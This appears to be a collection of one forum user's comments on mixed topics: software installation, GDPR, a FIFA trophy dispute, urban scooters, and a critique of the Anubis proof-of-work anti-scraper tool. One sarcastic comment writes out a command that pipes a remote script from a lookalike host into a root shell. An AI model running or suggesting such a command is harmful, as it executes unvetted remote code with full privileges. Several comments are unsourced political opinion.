I don’t want to trust a website, which is susceptible to typos and lookalikes (see e.g. putty.org) and relies on countless other services that can inject malware.

Code signing was creates for this reason: ensure that the program is authentic and unaltered. Package managers do this perfectly.

You must run curl http://totallylegitwebsite.ru/install | sudo sh, it’s the only way to install our product. Don’t even look at the several thousand lines of illegible shell script, just pipe it straight to your shell. We are a very serious project.

Many EU countries have their own different laws about this stuff. The GDPR likely does not apply here because of the exception for “purely personal and household activities”, article 2(2)©.

Incomprehensible, I love it

I have no doubt that FIFA bribes everyone, including Trump. It’s just in this particular instance that, if it was their intent to bribe Trump with a trophy, they would have created a second one with real gold instead of giving Chelsea a replica. It seems much more likely that Trump just stole it and FIFA didn’t raise a stink about it in order to preserve relations.

Why not present that context to users and let us draw our own conclusions?

If it works it works. You mathematicians just don’t understand the pragmatics. What is tech debt?

It clearly doesn’t make sense that the FIFA would spend a small fortune on creating a trophy, only to give the winner a replica. It is concerning to me that you still take Trump’s word at face value, no matter how obvious and self-serving the lie.

Just more proof that the universe is flat

They are both a problem. Cars took up most walkable areas and now venture capitalists are exploiting what little is left by littering it with their electric scooters and bikes. Rentals are an important part of a mobility strategy, but they should be run by the government and get their own parking infrastructure.

I think supporting Ukraine is good, but so does the MIC. Surely you must recognize that they benefit greatly from a neverending conflict. It is important to recognize the difference in motivation.

Künstliche Intelligenz 😔

The MIC does want you to stand with Israel and Ukraine though.

If you’re deliberately belittling me I won’t engage. Goodbye.

“You criticize society yet you participate in it. Curious.”

To be clear, I am not minimizing the problems of scrapers. I am merely pointing out that this strategy of proof-of-work has nasty side effects and we need something better.

These issues are not short term. PoW means you are entering into an arms race against an adversary with bottomless pockets that inherently requires a ton of useless computations in the browser.

When it comes to moving towards something based on heuristics, which is what the developer was talking about there, that is much better. But that is basically what many others are already doing (like the “I am not a robot” checkmark) and fundamentally different from the PoW that I argue against.

Go do heuristics, not PoW.

It depends on the website’s setting. I have the same phone and there was one website where it took more than 20 seconds.

The power consumption is significant, because it needs to be. That is the entire point of this design. If it doesn’t take significant a significant number of CPU cycles, scrapers will just power through them. This may not be significant for an individual user, but it does add up when this reaches widespread adoption and everyone’s devices have to solve those challenges.

It is basically instantaneous on my 12 year old Keppler GPU Linux Box.

It depends on what the website admin sets, but I’ve had checks take more than 20 seconds on my reasonably modern phone. And as scrapers get more ruthless, that difficulty setting will have to go up.

The Cryptography happening is something almost all browsers from the last 10 years can do natively that Scrapers have to be individually programmed to do. Making it several orders of magnitude beyond impractical for every single corporate bot to be repurposed for.

At best these browsers are going to have some efficient CPU implementation. Scrapers can send these challenges off to dedicated GPU farms or even FPGAs, which are an order of magnitude faster and more efficient. This is also not complex, a team of engineers could set this up in a few days.

Only to then be rendered moot, because it’s an open-source project that someone will just update the cryptographic algorithm for.

There might be something in changing to a better, GPU resistant algorithm like argon2, but browsers don’t support those natively so you would rely on an even less efficient implementation in js or wasm. Quickly changing details of the algorithm in a game of whack-a-mole could work to an extent, but that would turn this into an arms race. And the scrapers can afford far more development time than the maintainers of Anubis.

These posts contain links to articles, if you read them you might answer some of your own questions and have more to contribute to the conversation.

This is very condescending. I would prefer if you would just engage with my arguments.

On the contrary, I’m hoping for a solution that is better than this.

Do you disagree with any part of my assessment? How do you think Anubis will work long term?

I get that website admins are desperate for a solution, but Anubis is fundamentally flawed.

It is hostile to the user, because it is very slow on older hardware andere forces you to use javascript.

It is bad for the environment, because it wastes energy on useless computations similar to mining crypto. If more websites start using this, that really adds up.

But most importantly, it won’t work in the end. These scraping tech companies have much deeper pockets and can use specialized hardware that is much more efficient at solving these challenges than a normal web browser.